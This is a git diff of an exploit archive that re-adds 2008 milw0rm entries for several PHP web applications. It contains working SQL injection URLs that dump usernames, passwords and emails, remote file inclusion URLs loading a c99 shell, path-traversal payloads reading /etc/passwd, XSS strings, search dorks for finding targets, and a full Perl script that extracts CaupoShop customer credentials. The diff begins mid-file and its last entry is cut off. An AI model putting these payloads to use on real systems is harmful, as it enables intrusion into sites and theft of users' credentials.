- # http://site.com/site.php?contentsid=-1+UNION%20SELECT+1,2,4,3,concat_ws(char(58),m_id,m_username,m_password,m_email),6,7+from+member/*
- #
- #
- # Dork example: "Powered by samart-cms"
- #
- ###############################################
- # Greetz: D3m0n_DE * sid.psycho * str0ke and otherz..
- ###############################################
-
- [ dun / 2008 ]
-
-*******************************************************************************************
-
-# milw0rm.com [2008-06-19]
+ :::::::-. ... ::::::. :::.
+ ;;, `';, ;; ;;;`;;;;, `;;;
+ `[[ [[[[' [[[ [[[[[. '[[
+ $$, $$$$ $$$ $$$ "Y$c$$
+ 888_,o8P'88 .d888 888 Y88
+ MMMMP"` "YmmMMMM"" MMM YM
+
+ [ Discovered by dun \ dun[at]strcpy.pl ]
+
+ #################################################################
+ # [ samart-cms 2.0 ] Remote SQL Injection Vulnerability #
+ #################################################################
+ #
+ # Script site: http://samart.6x.to/
+ #
+ # Vuln:
+ # http://site.com/site.php?contentsid=-1+UNION%20SELECT+1,2,4,3,concat_ws(char(58),m_id,m_username,m_password,m_email),6,7+from+member/*
+ #
+ #
+ # Dork example: "Powered by samart-cms"
+ #
+ ###############################################
+ # Greetz: D3m0n_DE * sid.psycho * str0ke and otherz..
+ ###############################################
+
+ [ dun / 2008 ]
+
+*******************************************************************************************
+
+# milw0rm.com [2008-06-19]
diff --git a/platforms/php/webapps/5863.txt b/platforms/php/webapps/5863.txt
index 008c8b209..a08118248 100755
--- a/platforms/php/webapps/5863.txt
+++ b/platforms/php/webapps/5863.txt
@@ -1,30 +1,30 @@
- :::::::-. ... ::::::. :::.
- ;;, `';, ;; ;;;`;;;;, `;;;
- `[[ [[[[' [[[ [[[[[. '[[
- $$, $$$$ $$$ $$$ "Y$c$$
- 888_,o8P'88 .d888 888 Y88
- MMMMP"` "YmmMMMM"" MMM YM
-
- [ Discovered by dun \ dun[at]strcpy.pl ]
-
- ##########################################################
- # [ CMS-BRD ] Remote SQL Injection Vulnerability #
- ##########################################################
- #
- # Script site: http://www.cms.brdconcept.fr/
- #
- # Vuln:
- # http://site.com/index.php?lang=en&menuclick=-1+UNION+SELECT+concat_ws(char(58),USER(),DATABASE(),VERSION())/*
- #
- #
- # Dork example: "Powered By CMS-BRD"
- #
- ###############################################
- # Greetz: D3m0n_DE * sid.psycho * str0ke and otherz..
- ###############################################
-
- [ dun / 2008 ]
-
-*******************************************************************************************
-
-# milw0rm.com [2008-06-19]
+ :::::::-. ... ::::::. :::.
+ ;;, `';, ;; ;;;`;;;;, `;;;
+ `[[ [[[[' [[[ [[[[[. '[[
+ $$, $$$$ $$$ $$$ "Y$c$$
+ 888_,o8P'88 .d888 888 Y88
+ MMMMP"` "YmmMMMM"" MMM YM
+
+ [ Discovered by dun \ dun[at]strcpy.pl ]
+
+ ##########################################################
+ # [ CMS-BRD ] Remote SQL Injection Vulnerability #
+ ##########################################################
+ #
+ # Script site: http://www.cms.brdconcept.fr/
+ #
+ # Vuln:
+ # http://site.com/index.php?lang=en&menuclick=-1+UNION+SELECT+concat_ws(char(58),USER(),DATABASE(),VERSION())/*
+ #
+ #
+ # Dork example: "Powered By CMS-BRD"
+ #
+ ###############################################
+ # Greetz: D3m0n_DE * sid.psycho * str0ke and otherz..
+ ###############################################
+
+ [ dun / 2008 ]
+
+*******************************************************************************************
+
+# milw0rm.com [2008-06-19]
diff --git a/platforms/php/webapps/5864.txt b/platforms/php/webapps/5864.txt
index 060f99913..a6e51ec8a 100755
--- a/platforms/php/webapps/5864.txt
+++ b/platforms/php/webapps/5864.txt
@@ -1,38 +1,38 @@
-###############################################################
-#
-# Orlando CMS classes Remote File Include Vulnerabilities
-#
-###############################################################
-#
-# Discovered by : Ciph3r
-#
-#
-# MAIL : Ciph3r_blackhat@yahoo.com
-#
-#
-# SP TANX4 : Iranian hacker & Kurdish Security TEAM
-#
-#
-# CLASS : remote
-#
-# download cms: http://sourceforge.net/project/showfiles.php?group_id=195547
-#
-################################################################
-#
-# C0de :
-#
-#
-# include($GLOBALS['preloc']."modules/core/logger/sticky.php");
-#
-#
-###############################################################
-
-EXPLOIT :
-
-http://127.0.0.1/cms/Orlando/modules/core/logger/init.php?GLOBALS[preloc]=http://127.0.0.1/c99.php?
-
-http://127.0.0.1/cms/Orlando/AJAX/newscat.php?GLOBALS[preloc]=http://127.0.0.1/c99.php?
-
-#####################################################################
-
-# milw0rm.com [2008-06-19]
+###############################################################
+#
+# Orlando CMS classes Remote File Include Vulnerabilities
+#
+###############################################################
+#
+# Discovered by : Ciph3r
+#
+#
+# MAIL : Ciph3r_blackhat@yahoo.com
+#
+#
+# SP TANX4 : Iranian hacker & Kurdish Security TEAM
+#
+#
+# CLASS : remote
+#
+# download cms: http://sourceforge.net/project/showfiles.php?group_id=195547
+#
+################################################################
+#
+# C0de :
+#
+#
+# include($GLOBALS['preloc']."modules/core/logger/sticky.php");
+#
+#
+###############################################################
+
+EXPLOIT :
+
+http://127.0.0.1/cms/Orlando/modules/core/logger/init.php?GLOBALS[preloc]=http://127.0.0.1/c99.php?
+
+http://127.0.0.1/cms/Orlando/AJAX/newscat.php?GLOBALS[preloc]=http://127.0.0.1/c99.php?
+
+#####################################################################
+
+# milw0rm.com [2008-06-19]
diff --git a/platforms/php/webapps/5865.txt b/platforms/php/webapps/5865.txt
index 70fe19375..49ef39b38 100755
--- a/platforms/php/webapps/5865.txt
+++ b/platforms/php/webapps/5865.txt
@@ -1,102 +1,102 @@ -#!/usr/bin/perl -###################### -# -#CaupoShop Classic 1.3 Remote Exploit -# -###################### -# -#Bug by: h0yt3r -# -#Dork: inurl:csc_article_details.php -# Couldnt find a stable dork for this specific Version. -#Exploit will only work on correct version. -# -## -### -## -# -#I found this long time ago but never actually shared it. -#As the userid's are a bit messy you will only get the top 1 row value. -#Change it if you like. -# -#Gr33tz go to: -#thund3r, ramon, b!zZ!t, Free-Hack, Sys-Flaw and of course the pwning h4ck-y0u Team -######## - -use LWP::UserAgent; -my $userAgent = LWP::UserAgent->new; - -usage(); - -$server = $ARGV[0]; -$dir = $ARGV[1]; - -print"\n"; -if (!$dir) { die "Read Usage!\n"; } - -$filename ="csc_article_details.php"; -my $url = "http://".$server.$dir.$filename."?"; - -my $Attack= $userAgent->get($url); -if ($Attack->is_success) -{ - print "[x] Attacking ".$url."\n"; -} -else -{ - print "Couldn't connect to ".$url."!"; - exit; -} - -print "[x] Injecting Black Magic\n"; - -my @count = ("66666"); - -for ($i = 6; $i<99; $i++) -{ - my $selectUrl = $url."saArticle[ID]=-275 union select 1,2,3,4, @count"; - my $Attack= $userAgent->get($selectUrl); - if($Attack->content =~ 66666) - { last; } - else - { push(@count,",66666"); } -} - -my $Final = $url."saArticle[ID]=-1 union select 1,2,3,concat(1337,email,0x3a,password,1337), @count from csc_customer"; - -my $Attack= $userAgent->get($Final); - -if($Attack->content =~ m/1337(.*?):(.*?)1337/i) -{ - my $login = $1; - my $pass = $2; - print "[x] Success!\n"; - print "[x] Top 1 User Details:\n"; - - print " Username: ".$login."\n"; - print " Password: ".$pass."\n"; -} -else -{ - print"[x] Something wrong...Version?\n"; - exit; - -} - -sub usage() -{ - print q - { - ##################################################### - CaupoShop Classic Remote Exploit - -Written by h0yt3r- - Usage: CC.pl [Server] [Path] - Sample: - perl CC.pl www.site.com /shop/ - 
###################################################### - }; - -} -#eof - -# milw0rm.com [2008-06-19] +#!/usr/bin/perl +###################### +# +#CaupoShop Classic 1.3 Remote Exploit +# +###################### +# +#Bug by: h0yt3r +# +#Dork: inurl:csc_article_details.php +# Couldnt find a stable dork for this specific Version. +#Exploit will only work on correct version. +# +## +### +## +# +#I found this long time ago but never actually shared it. +#As the userid's are a bit messy you will only get the top 1 row value. +#Change it if you like. +# +#Gr33tz go to: +#thund3r, ramon, b!zZ!t, Free-Hack, Sys-Flaw and of course the pwning h4ck-y0u Team +######## + +use LWP::UserAgent; +my $userAgent = LWP::UserAgent->new; + +usage(); + +$server = $ARGV[0]; +$dir = $ARGV[1]; + +print"\n"; +if (!$dir) { die "Read Usage!\n"; } + +$filename ="csc_article_details.php"; +my $url = "http://".$server.$dir.$filename."?"; + +my $Attack= $userAgent->get($url); +if ($Attack->is_success) +{ + print "[x] Attacking ".$url."\n"; +} +else +{ + print "Couldn't connect to ".$url."!"; + exit; +} + +print "[x] Injecting Black Magic\n"; + +my @count = ("66666"); + +for ($i = 6; $i<99; $i++) +{ + my $selectUrl = $url."saArticle[ID]=-275 union select 1,2,3,4, @count"; + my $Attack= $userAgent->get($selectUrl); + if($Attack->content =~ 66666) + { last; } + else + { push(@count,",66666"); } +} + +my $Final = $url."saArticle[ID]=-1 union select 1,2,3,concat(1337,email,0x3a,password,1337), @count from csc_customer"; + +my $Attack= $userAgent->get($Final); + +if($Attack->content =~ m/1337(.*?):(.*?)1337/i) +{ + my $login = $1; + my $pass = $2; + print "[x] Success!\n"; + print "[x] Top 1 User Details:\n"; + + print " Username: ".$login."\n"; + print " Password: ".$pass."\n"; +} +else +{ + print"[x] Something wrong...Version?\n"; + exit; + +} + +sub usage() +{ + print q + { + ##################################################### + CaupoShop Classic Remote Exploit + -Written by h0yt3r- + Usage: CC.pl 
[Server] [Path] + Sample: + perl CC.pl www.site.com /shop/ + ###################################################### + }; + +} +#eof + +# milw0rm.com [2008-06-19] diff --git a/platforms/php/webapps/5866.txt b/platforms/php/webapps/5866.txt index 738b0e389..9abb8c752 100755 --- a/platforms/php/webapps/5866.txt +++ b/platforms/php/webapps/5866.txt 
@@ -1,39 +1,39 @@
-###############################################################
-#
-# [phpbb3] Lotus Core CMS v1.0.1 Remote File Include Vulnerabilities
-#
-###############################################################
-#
-# Discovered by : Ciph3r
-#
-#
-# MAIL : Ciph3r_blackhat@yahoo.com
-#
-#
-# SP TANX4 : Iranian hacker & Kurdish Security TEAM
-#
-# CLASS : remote
-#
-# download cms: http://sourceforge.net/project/showfiles.php?group_id=215112
-#
-################################################################
-#
-# C0de :
-#
-#
-# include($phpbb_root_path . 'includes/bbcode.' . $phpEx);
-#
-#
-###############################################################
-
-EXPLOIT :
-
-
- http://127.0.0.1/cms/Lotus%20Core%20v1.0.1/system/plugins/index.php?phpbb_root_path=http://127.0.0.1/c99.php?
-
- http://127.0.0.1/cms/Lotus%20Core%20v1.0.1/system/plugins/error/404.php?phpbb_root_path=http://127.0.0.1/c99.php?
-
-
-#####################################################################
-
-# milw0rm.com [2008-06-19]
+###############################################################
+#
+# [phpbb3] Lotus Core CMS v1.0.1 Remote File Include Vulnerabilities
+#
+###############################################################
+#
+# Discovered by : Ciph3r
+#
+#
+# MAIL : Ciph3r_blackhat@yahoo.com
+#
+#
+# SP TANX4 : Iranian hacker & Kurdish Security TEAM
+#
+# CLASS : remote
+#
+# download cms: http://sourceforge.net/project/showfiles.php?group_id=215112
+#
+################################################################
+#
+# C0de :
+#
+#
+# include($phpbb_root_path . 'includes/bbcode.' . $phpEx);
+#
+#
+###############################################################
+
+EXPLOIT :
+
+
+ http://127.0.0.1/cms/Lotus%20Core%20v1.0.1/system/plugins/index.php?phpbb_root_path=http://127.0.0.1/c99.php?
+
+ http://127.0.0.1/cms/Lotus%20Core%20v1.0.1/system/plugins/error/404.php?phpbb_root_path=http://127.0.0.1/c99.php?
+
+
+#####################################################################
+
+# milw0rm.com [2008-06-19]
diff --git a/platforms/php/webapps/5869.txt b/platforms/php/webapps/5869.txt
index 58798ea86..ee00a4b0b 100755
--- a/platforms/php/webapps/5869.txt
+++ b/platforms/php/webapps/5869.txt
@@ -1,106 +1,106 @@ -########################## www.BugReport.ir ####################################### -# -# AmnPardaz Security Research Team -# -# Title: Virtual Support Office-XP Multiple Vulnerabilities. -# Vendor: www.vso-xp.com -# Vulnerable Version: 3.0.29, 3.0.27 and prior versions -# Exploit: Available -# Impact: High -# Fix: N/A -# Original Advisory: www.bugreport.ir/?/47 -################################################################################### - -#################### -1. Description: -#################### - - Virtual Support Office XP is Web Based Help Desk Software Solution which allows you to forge strong - relationships and increase customer satisfaction, while dramatically streamlining support operations. - With the VSO-XP application, customer service and support professionals have the tools they need to - surpass the most ambitious quality-of-service or productivity goals you establish. - -#################### -2. Vulnerabilities: -#################### - - 2.1. Broken Authentication and Session Management. An attacker can have access to classified information. And see some of admin pages. such as: -"/admin/Companies.asp", "/admin/customfeild.asp" and "admin/EmailAccountsUpd.asp". The Last one is particularly important for she Change the Servers Name and Mail Box and Servers Port. - - 2.2. Broken Authentication.An attacker can register (sign up) users at "/signup.asp" without any kind of supervision or disclosureing any kind of information-even submitting a true email address is not necessary-she can obtain her password by injection-see. - - 2.3. Broken Authentication and Session Management. An attacker can make an admin user at "/admin/addressnew.asp". - - 2.4. Injection Flaws. SQL Injection in "/admin/CustomFields.asp" in "Group_ID" parameter. By using it an attacker can obtain the password of any user she wishes-including admin's. She can also get other information such as version of the database and... - 2.4.1. 
Exploit: - Check the exploit section. - 2.5. Injection Flaws. SQL Injection in "/getpassword.asp" in"userID" parameter. By using it an attacker can obtain the password of any user she wishes. - 2.5.1. Exploit: - Check the exploit section. - 2.6. Injection Flaws. SQL Injection in "/admin/accountupd.asp" in "keyid" parameter.Classified information can be obtained. - 2.6.1. POC: - https://url/admin/accountupd.asp?keyid=1%20having%201=1 - 2.7. Injection Flaws. SQL Injection in "/admin/clientupdreg.asp" in "Client_ID" parameter. - 2.7.1. POC: - https://url/admin/clientupdreg.asp?Client_ID=1%20having%201=1 - 2.8. Injection Flaws. SQL Injection in "/admin/EmailAccountsUpd_process.asp" in "KeyID" parameter. - 2.8.1. POC: - https://url/admin/EmailAccountsUpd_process.asp?KeyID=1 order by 2 - 2.9. Cross Site Scripting. There is a XSS in "/cases/case_search.asp" in search field. - 2.9.1. POC: - Insert "> - 2.10. Cross Site Scripting. There is a XSS in "/url/kb/kb_home.asp" in Search Field. - 2.10.1. POC: - Insert "> - 2.11 Cross Site Scripting. There is a XSS in "/downloads/search_folders.asp" in Search Fields. - 2.11.1. POC: - Insert "> - 2.12. Cross Site Scripting. There is a XSS in "/reports/MyIssuesReport.asp?id=336" in Report Title and Subject fields. - 2.12.1. POC: - Insert "> - 2.13. volunerable to file uploading and finding the phisical path to the file. - 2.13.1. Exploit: - Check the exploit section. - 2.14. Path disclosure. - 2.14.1 POC - https://url/admin/accountnew2.asp -#################### -3. Exploits: -#################### - Original Exploit URL: http://bugreport.ir/index.php?/47/exploit - Note1: Use Internet Explorer (IE) for best result. - 3.4.1 SQL Injection in "/admin/CustomFields.asp" in "Group_ID" parameter. 
- ------------- - Obtain admin's password: - https://[URL]/admin/CustomFields.asp?Group_ID=1%20union%20select%20PASSWORD,1,1,1,1,1%20from%20users%20where%20USERID=%20'admin'-- - ------------- - Get other information such as version of the database and...: - https://[URL]/admin/CustomFields.asp?Group_ID=1union%20select%20@@version,1,1,1,1,1-- - ------------- - 3.5.1 SQL Injection in "/admin/getpassword.asp" in "userID" parameter. - Insert the following Code in burpproxy, in userID field, change ANYUSERID to your choice of userID and get the password! - ------------- - obtain the password of any user she wishes: - m%27%20or%201%20in%20%28select%20PASSWORD%20from%20users%20where%20USERID%3D%27ANYUSERID%27%29-- - ------------- - 3.13.1 Scenario for file uploading and finding the physical path to the file. - ------------- - Step1: Find the id of an existing folder easily at "/downloads/folders_root.asp?vsoxp_select=0" - Step2: Go to "/downloads/createfile.asp?id=VALIDFOLDERID" and upload your file. - Step3: Go back to step 1 and find your file?s ID. - Step4: Go to "/downloads/openlink.asp?id=YOURFILEID" and see the physical address of your file at server! - ------------- -#################### -4. Solution: -#################### - Edit the source code to ensure that inputs are properly sanitized for XSSes and Injections, and wait for vendor patch. -#################### -5. Credit: -#################### -AmnPardaz Security Research & Penetration Testing Group -Web security is our art. -Contact: admin[4t}bugreport{d0t]ir -WwW.BugReport.ir -WwW.AmnPardaz.com - -# milw0rm.com [2008-06-20] +########################## www.BugReport.ir ####################################### +# +# AmnPardaz Security Research Team +# +# Title: Virtual Support Office-XP Multiple Vulnerabilities. 
+# Vendor: www.vso-xp.com +# Vulnerable Version: 3.0.29, 3.0.27 and prior versions +# Exploit: Available +# Impact: High +# Fix: N/A +# Original Advisory: www.bugreport.ir/?/47 +################################################################################### + +#################### +1. Description: +#################### + + Virtual Support Office XP is Web Based Help Desk Software Solution which allows you to forge strong + relationships and increase customer satisfaction, while dramatically streamlining support operations. + With the VSO-XP application, customer service and support professionals have the tools they need to + surpass the most ambitious quality-of-service or productivity goals you establish. + +#################### +2. Vulnerabilities: +#################### + + 2.1. Broken Authentication and Session Management. An attacker can have access to classified information. And see some of admin pages. such as: +"/admin/Companies.asp", "/admin/customfeild.asp" and "admin/EmailAccountsUpd.asp". The Last one is particularly important for she Change the Servers Name and Mail Box and Servers Port. + + 2.2. Broken Authentication.An attacker can register (sign up) users at "/signup.asp" without any kind of supervision or disclosureing any kind of information-even submitting a true email address is not necessary-she can obtain her password by injection-see. + + 2.3. Broken Authentication and Session Management. An attacker can make an admin user at "/admin/addressnew.asp". + + 2.4. Injection Flaws. SQL Injection in "/admin/CustomFields.asp" in "Group_ID" parameter. By using it an attacker can obtain the password of any user she wishes-including admin's. She can also get other information such as version of the database and... + 2.4.1. Exploit: + Check the exploit section. + 2.5. Injection Flaws. SQL Injection in "/getpassword.asp" in"userID" parameter. By using it an attacker can obtain the password of any user she wishes. + 2.5.1. 
Exploit: + Check the exploit section. + 2.6. Injection Flaws. SQL Injection in "/admin/accountupd.asp" in "keyid" parameter.Classified information can be obtained. + 2.6.1. POC: + https://url/admin/accountupd.asp?keyid=1%20having%201=1 + 2.7. Injection Flaws. SQL Injection in "/admin/clientupdreg.asp" in "Client_ID" parameter. + 2.7.1. POC: + https://url/admin/clientupdreg.asp?Client_ID=1%20having%201=1 + 2.8. Injection Flaws. SQL Injection in "/admin/EmailAccountsUpd_process.asp" in "KeyID" parameter. + 2.8.1. POC: + https://url/admin/EmailAccountsUpd_process.asp?KeyID=1 order by 2 + 2.9. Cross Site Scripting. There is a XSS in "/cases/case_search.asp" in search field. + 2.9.1. POC: + Insert "> + 2.10. Cross Site Scripting. There is a XSS in "/url/kb/kb_home.asp" in Search Field. + 2.10.1. POC: + Insert "> + 2.11 Cross Site Scripting. There is a XSS in "/downloads/search_folders.asp" in Search Fields. + 2.11.1. POC: + Insert "> + 2.12. Cross Site Scripting. There is a XSS in "/reports/MyIssuesReport.asp?id=336" in Report Title and Subject fields. + 2.12.1. POC: + Insert "> + 2.13. volunerable to file uploading and finding the phisical path to the file. + 2.13.1. Exploit: + Check the exploit section. + 2.14. Path disclosure. + 2.14.1 POC + https://url/admin/accountnew2.asp +#################### +3. Exploits: +#################### + Original Exploit URL: http://bugreport.ir/index.php?/47/exploit + Note1: Use Internet Explorer (IE) for best result. + 3.4.1 SQL Injection in "/admin/CustomFields.asp" in "Group_ID" parameter. + ------------- + Obtain admin's password: + https://[URL]/admin/CustomFields.asp?Group_ID=1%20union%20select%20PASSWORD,1,1,1,1,1%20from%20users%20where%20USERID=%20'admin'-- + ------------- + Get other information such as version of the database and...: + https://[URL]/admin/CustomFields.asp?Group_ID=1union%20select%20@@version,1,1,1,1,1-- + ------------- + 3.5.1 SQL Injection in "/admin/getpassword.asp" in "userID" parameter. 
+ Insert the following Code in burpproxy, in userID field, change ANYUSERID to your choice of userID and get the password! + ------------- + obtain the password of any user she wishes: + m%27%20or%201%20in%20%28select%20PASSWORD%20from%20users%20where%20USERID%3D%27ANYUSERID%27%29-- + ------------- + 3.13.1 Scenario for file uploading and finding the physical path to the file. + ------------- + Step1: Find the id of an existing folder easily at "/downloads/folders_root.asp?vsoxp_select=0" + Step2: Go to "/downloads/createfile.asp?id=VALIDFOLDERID" and upload your file. + Step3: Go back to step 1 and find your file?s ID. + Step4: Go to "/downloads/openlink.asp?id=YOURFILEID" and see the physical address of your file at server! + ------------- +#################### +4. Solution: +#################### + Edit the source code to ensure that inputs are properly sanitized for XSSes and Injections, and wait for vendor patch. +#################### +5. Credit: +#################### +AmnPardaz Security Research & Penetration Testing Group +Web security is our art. +Contact: admin[4t}bugreport{d0t]ir +WwW.BugReport.ir +WwW.AmnPardaz.com + +# milw0rm.com [2008-06-20] diff --git a/platforms/php/webapps/5870.txt b/platforms/php/webapps/5870.txt index 1f845d494..2d11ad8d0 100755 --- a/platforms/php/webapps/5870.txt +++ b/platforms/php/webapps/5870.txt 
@@ -1,67 +1,67 @@ -########################## www.BugReport.ir ####################################### -# -# AmnPardaz Security Research Team -# -# Title: GL-SH Deaf Forum <=6.5.5 Multiple Vulnerabilities -# Vendor: www.frank-karau.de -# Vulnerable Version: 6.5.5 and prior versions -# Exploit: Available -# Impact: High -# Fix: N/A -# Original Advisory: www.bugreport.ir/?/46 -################################################################################### - -#################### -1. Description: -#################### - Gl-SH Deaf board is programmed a free board in PHP, without My SQL, With 10 Designs and 5 languages. -#################### -2. Vulnerabilities: -#################### - 2.1. Local File Inclusion (LFI) in "/functions.php" in "FORUM_LANGUAGE" parameter. - 2.1.1. Exploit: - Check the exploit/POC section. - 2.2. File (image) Upload without premission. - 2.2.1. Exploit: - Check the exploit/POC section. - 2.3. Cross Site Scripting (XSS). Reflected XSS attack in "search.php". - 2.3.1. Exploit: - Check the exploit/POC section. - -#################### -3. Exploits/POCs: -#################### - Original Exploit URL: http://bugreport.ir/index.php?/46/exploit - 3.1. Local File Inclusion (LFI) in "/functions.php" in "FORUM_LANGUAGE" parameter. - ------------- - LFI: - http://[URL]/[Forum Path]/functions.php?FORUM_LANGUAGE=/../../../../../../../../../../etc/passwd - ------------- - 3.2. File (image) Upload with out premission. - ------------- - Uploader link: - http://[URL]/[Forum Path]/upload.php - ------------- - 3.3. Cross Site Scripting (XSS). Reflected XSS attack in "search.php". - ------------- -
    -
    - "<SCRIPT>alert(/BugReport.ir-XSS/.source)</SCRIPT> -
    - - - ------------- -#################### -4. Solution: -#################### - Edit the source code to ensure that inputs are properly sanitized. check permission for upload page. -#################### -5. Credit: -#################### -AmnPardaz Security Research & Penetration Testing Group -Contact: admin[4t}bugreport{d0t]ir -WwW.BugReport.ir -WwW.AmnPardaz.com - -# milw0rm.com [2008-06-20] +########################## www.BugReport.ir ####################################### +# +# AmnPardaz Security Research Team +# +# Title: GL-SH Deaf Forum <=6.5.5 Multiple Vulnerabilities +# Vendor: www.frank-karau.de +# Vulnerable Version: 6.5.5 and prior versions +# Exploit: Available +# Impact: High +# Fix: N/A +# Original Advisory: www.bugreport.ir/?/46 +################################################################################### + +#################### +1. Description: +#################### + Gl-SH Deaf board is programmed a free board in PHP, without My SQL, With 10 Designs and 5 languages. +#################### +2. Vulnerabilities: +#################### + 2.1. Local File Inclusion (LFI) in "/functions.php" in "FORUM_LANGUAGE" parameter. + 2.1.1. Exploit: + Check the exploit/POC section. + 2.2. File (image) Upload without premission. + 2.2.1. Exploit: + Check the exploit/POC section. + 2.3. Cross Site Scripting (XSS). Reflected XSS attack in "search.php". + 2.3.1. Exploit: + Check the exploit/POC section. + +#################### +3. Exploits/POCs: +#################### + Original Exploit URL: http://bugreport.ir/index.php?/46/exploit + 3.1. Local File Inclusion (LFI) in "/functions.php" in "FORUM_LANGUAGE" parameter. + ------------- + LFI: + http://[URL]/[Forum Path]/functions.php?FORUM_LANGUAGE=/../../../../../../../../../../etc/passwd + ------------- + 3.2. File (image) Upload with out premission. + ------------- + Uploader link: + http://[URL]/[Forum Path]/upload.php + ------------- + 3.3. Cross Site Scripting (XSS). Reflected XSS attack in "search.php". 
+ ------------- + + + "<SCRIPT>alert(/BugReport.ir-XSS/.source)</SCRIPT> +
    + + + ------------- +#################### +4. Solution: +#################### + Edit the source code to ensure that inputs are properly sanitized. check permission for upload page. +#################### +5. Credit: +#################### +AmnPardaz Security Research & Penetration Testing Group +Contact: admin[4t}bugreport{d0t]ir +WwW.BugReport.ir +WwW.AmnPardaz.com + +# milw0rm.com [2008-06-20] diff --git a/platforms/php/webapps/5871.txt b/platforms/php/webapps/5871.txt index 5a8522b89..3fed66e58 100755 --- a/platforms/php/webapps/5871.txt +++ b/platforms/php/webapps/5871.txt 
@@ -1,28 +1,28 @@
-###################################################################################
-#
-# Name : FireAnt v1.3 Local File Inclusion Vulnerability
-# Author : cOndemned
-# Dork : use Your brain (:
-# Greetz : ZaBeaTy, str0ke, GregStar, irk4z, Sandtalker & Avantura ;**
-#
-###################################################################################
-
-Source :
-
- // index.php
-
- 8. $page = "bug_list"; //default page
- 9. if (!empty($_GET['page'])) {
- 10. $page = strip_tags($_GET['page']);
-
- 99. if (file_exists("./".$page.".php")) {
-
- 104. include("./".$page.".php");
-
-
-Proof of Concept :
-
- http://[host]/[FireAnt1.3]/index.php?page=../../../../etc/passwd%00
- http://[host]/[FireAnt1.3]/index.php?page=../../../../[local_file]%00
-
-# milw0rm.com [2008-06-20]
+###################################################################################
+#
+# Name : FireAnt v1.3 Local File Inclusion Vulnerability
+# Author : cOndemned
+# Dork : use Your brain (:
+# Greetz : ZaBeaTy, str0ke, GregStar, irk4z, Sandtalker & Avantura ;**
+#
+###################################################################################
+
+Source :
+
+ // index.php
+
+ 8. $page = "bug_list"; //default page
+ 9. if (!empty($_GET['page'])) {
+ 10. $page = strip_tags($_GET['page']);
+
+ 99. if (file_exists("./".$page.".php")) {
+
+ 104. include("./".$page.".php");
+
+
+Proof of Concept :
+
+ http://[host]/[FireAnt1.3]/index.php?page=../../../../etc/passwd%00
+ http://[host]/[FireAnt1.3]/index.php?page=../../../../[local_file]%00
+
+# milw0rm.com [2008-06-20]
diff --git a/platforms/php/webapps/5872.txt b/platforms/php/webapps/5872.txt
index 43a9dfc68..897e59a5e 100755
--- a/platforms/php/webapps/5872.txt
+++ b/platforms/php/webapps/5872.txt
@@ -1,31 +1,31 @@
-###################################################################################
-#
-# Name : FubarForum v1.5 Local File Inclusion Vulnerability
-# Author : cOndemned
-# Dork : for ex. "Powered by FubarForum v1.5"
-# Greetz : TBH, GregStar, ZaBeaTy, irk4z, Hawk, Sandtalker & Avantura ;*
-#
-###################################################################################
-
-Source :
-
- // index.php
-
- 5. if (!empty($_GET['page'])) { $page = $_GET['page']; } // <---- $page is being sended using GET method
-
- 91. if (file_exists("./".$page.".php")) { // <---- if only the file exists and we can use null byte (%00)
-
- 98. include("./".$page.".php"); // <---- our file will be included here :))
-
-PoC :
-
- http://[host]/[fubarforum_path]/index.php?page=../../../../etc/passwd%00
- http://[host]/[fubarforum_path]/index.php?page=../../../../[local_file]%00
-
-###################################################################################
-#
-# Together We stand tall, not gonna crash, not gonna fall - Children of Bodom
-#
-###################################################################################
-
-# milw0rm.com [2008-06-20]
+###################################################################################
+#
+# Name : FubarForum v1.5 Local File Inclusion Vulnerability
+# Author : cOndemned
+# Dork : for ex. "Powered by FubarForum v1.5"
+# Greetz : TBH, GregStar, ZaBeaTy, irk4z, Hawk, Sandtalker & Avantura ;*
+#
+###################################################################################
+
+Source :
+
+ // index.php
+
+ 5. if (!empty($_GET['page'])) { $page = $_GET['page']; } // <---- $page is being sended using GET method
+
+ 91. if (file_exists("./".$page.".php")) { // <---- if only the file exists and we can use null byte (%00)
+
+ 98. include("./".$page.".php"); // <---- our file will be included here :))
+
+PoC :
+
+ http://[host]/[fubarforum_path]/index.php?page=../../../../etc/passwd%00
+ http://[host]/[fubarforum_path]/index.php?page=../../../../[local_file]%00
+
+###################################################################################
+#
+# Together We stand tall, not gonna crash, not gonna fall - Children of Bodom
+#
+###################################################################################
+
+# milw0rm.com [2008-06-20]
diff --git a/platforms/php/webapps/5873.txt b/platforms/php/webapps/5873.txt
index a2a324f33..08df52406 100755
--- a/platforms/php/webapps/5873.txt
+++ b/platforms/php/webapps/5873.txt
@@ -1,53 +1,53 @@ - ____ _ _ _ ___ __ _ __ - / ___| ___ | \ | |_ _| | \ \ / /__ _ _ _ __ ___ ___| |/ _| ___ _ __ __ _ -| | _ / _ \| \| | | | | | |\ V / _ \| | | | '__/ __|/ _ \ | |_ / _ \| '__/ _` | -| |_| | (_) | |\ | |_| | | | | | (_) | |_| | | \__ \ __/ | _| (_) | | | (_| | - \____|\___/|_| \_|\__,_|_|_| |_|\___/ \__,_|_| |___/\___|_|_|(_)___/|_| \__, | ----------------------------------------------------------------------------|___/ -Exploit found by sToRm - - -LNP: Lightweight news Portal v1.0-BETA -Multiple Remote Vulnerabilities - - -Cross-Site Scripting --------------------- - -show_photo.php?photo="> -show_potd.php?potd="> - - -Insecure Administration ------------------------ - -The admin page faces us with a login, but many important functions are allowed -to be executed without a logged-in session. - -admin.php?A=potd_delete -admin.php?A=potd -admin.php?A=vote_update -admin.php?A=vote -admin.php?A=modifynews - - -Permanent Code Injection ------------------------- - -admin.php?A=vote - -"Current question" field allows for code injection, allowing us to force -all users browsing the poll to view an XSS or browser exploit. - - -File Upload ------------ - -admin.php?A=potd - -The "picture of the day" manager allows for further images to be -uploaded, but does not check for image validity. Although a phpshell -cannot be executed through this method, a source may be uploaded for -inclusion in further attacks, possibly an LFI somewhere on the server. 
